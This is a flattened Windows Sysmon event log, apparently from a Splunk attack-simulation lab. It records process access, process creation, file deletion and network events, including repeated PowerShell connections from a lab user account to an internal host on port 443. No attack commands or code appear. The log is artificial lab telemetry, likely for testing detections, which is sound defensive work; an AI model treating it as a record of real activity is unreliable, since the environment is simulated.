18:13:13.973{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4EB9-613A-4B90-03000000C801}2956C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084870Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:13.973{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4EB9-613A-4B90-03000000C801}2956C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084869Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:13.958{B81B27B7-4EB9-613A-4B90-03000000C801}2956C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK 
driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035084868Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:13.625{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88A8FE72868394CCFA7A919822F82EAB,SHA256=0C61DCAD36EAE8B5FE05EA16B019D0E0A4CBCEF85F05A3A58C3F8586D6579B03,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084867Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:13.473{B81B27B7-4EB9-613A-4A90-03000000C801}57405348C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000035084866Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:13.289{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4EB9-613A-4A90-03000000C801}5740C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084865Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:13.289{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084864Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:13:13.289{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084863Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:13.289{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084862Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:13:13.289{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084861Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:13.289{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4EB9-613A-4A90-03000000C801}5740C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084860Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:13.289{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4EB9-613A-4A90-03000000C801}5740C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084859Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:13.274{B81B27B7-4EB9-613A-4A90-03000000C801}5740C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035084881Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:39.342{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56664-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084880Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:14.659{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64600A3008C08F5858956773692EDE9B,SHA256=F696BE6DEED38FFFA475900DA12DDC826FEA4ED11515FE92471A7F2480172FCA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084879Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:14.358{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8B289F3C0C1A662EFBD665863DBFF782,SHA256=805369D84F7E6FC7F25D31B3FB297B874EDE3A25A966EB24AFF5E3B4BD3F4BF1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084878Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:14.288{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CAA73585D093A0AB854CCCE87B7D0296,SHA256=528F00CE51100719CA40460F6616B574098A9CD3F49227C37BB94E2195C3AD5D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084877Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:14.288{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8489B0205C0F41184CC14ECBB5871368,SHA256=DF94002A60298F9F3B22D9ED02D33DE7D99388077F7D750D59E47C37F6EA8FC6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000035084882Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:15.690{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1FAD0F360E895B1A7FC75C723B6CAE1,SHA256=212D9C7BEEE54F8BF0909C97CD3A758E2E7FDAFE5BB8BD7F13EDFB9EEF67C0A0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084883Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:16.704{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37DC3081A72B51A1B22B3EC4758346A7,SHA256=43F7545E3C04F77F2469AB1BA3349B40CCFCBAE76D05E77178600AD71E774EE0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084885Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:41.226{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56665-false10.0.1.12-8000- 23542300x800000000000000035084884Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:17.724{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AAFC79C6B48FCE666DD74E0C7F43198,SHA256=6C03AE4448CB6FE75F43DB58DF1FB414903B71F35A4BE8635F9BCA47BD23684D,IMPHASH=00000000000000000000000000000000falsefalse - 
insufficient disk space 23542300x800000000000000035084887Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:18.741{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE5EF4B478557E54AB9EE31D08F982D7,SHA256=1C19687B26A5165DF6870E14AC578EA78755B5F74B4A014B8ABC9BD68D4C580E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084886Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:18.388{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A58FCFE30563B4EC67A29DBA5FAD70CA,SHA256=B4931ECD3376EC8731EF523EF8425D26F68733B34DECAA9466D2FD797112A658,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084889Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:19.772{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48B55AFF5FE7742E0DF5F63974553A83,SHA256=3E3A9824F2BD45705139678E767EB5C7345280441BB51198090417E3C1051F65,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084888Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:13:43.378{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56666-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084890Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:20.820{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=940433998FE179A5E3151346A9B4773E,SHA256=4D4972135DC4305822B857F56BE5E243A3DDF1D6964E9D8998AF7305F79B950B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084891Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:21.839{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9ADF62C70BE76548C5B24190AD880316,SHA256=87F112BAC9CCA1A2D6781627BD7D88822F7C25347016487BF4368C8A8A6D8E54,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084893Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:22.857{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=983EDF9F7DC86D7974CD6BCD4FD2379F,SHA256=51C9463DA40153AA9BD860C5E40C18FCA017C902FCD9E43B5568C3060CFE19A6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000035084892Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:22.422{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8D037CA7CAE2E6CA7DD9745C026522A0,SHA256=81C052D61503A371F68343AA4544219BEFF52C18CCB0D0F2CCFD5A75C3F44209,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084895Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:23.872{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20FD24FBBE4D033EB7B42D26A089E2A8,SHA256=950E3C95F948CBB05075769D632F05FC5A68793517F8CE75D851B3C4E70CE50F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084894Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:47.142{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56667-false10.0.1.12-8000- 23542300x800000000000000035084897Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:24.902{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8F3B213435BC7DF28B3FF858C0666FA,SHA256=5B040553768EE796999F0642BC4195A2A575989BD7432152083D31C795605981,IMPHASH=00000000000000000000000000000000falsefalse - 
insufficient disk space 354300x800000000000000035084896Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:47.392{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56668-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084898Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:25.919{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E867FE3BAD7C8E20494CA1E850C3F71,SHA256=DD1BE522008D0999BCDE38382C8485B4C3230FEB1F6DB80CA7D692DAF7A8B15B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084899Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:26.938{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5172B71B94990DB6914DD06913E1198,SHA256=41B584A8E485F4FB325D271F6B2ECAA7D031E1B19ECF87DAECC26C69E4507D17,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084901Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:27.953{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C60F647D6B7F8FBEB127EF60445DAD9,SHA256=169278DC312EFC2CA9BF9174FCCC6879AE8436B0BA98C35E771E9EA8294CFAF4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084900Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:27.421{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8CD3DB8932BA2D54AA108281AB6B7CBF,SHA256=40DD5BDA61D3003D5F63D2308273101C3094DF1183222A5AC16EC3796C66C46E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084920Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:28.984{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8FFFEA59FDFBA96B42C65DE5C1B6E94,SHA256=77617EDB1E7F604703D0DF8F9473DF9F909050DC3E4CAC85B20575631DA552FB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084919Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:28.952{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4EC8-613A-4D90-03000000C801}5764C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000035084918Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:28.952{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084917Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 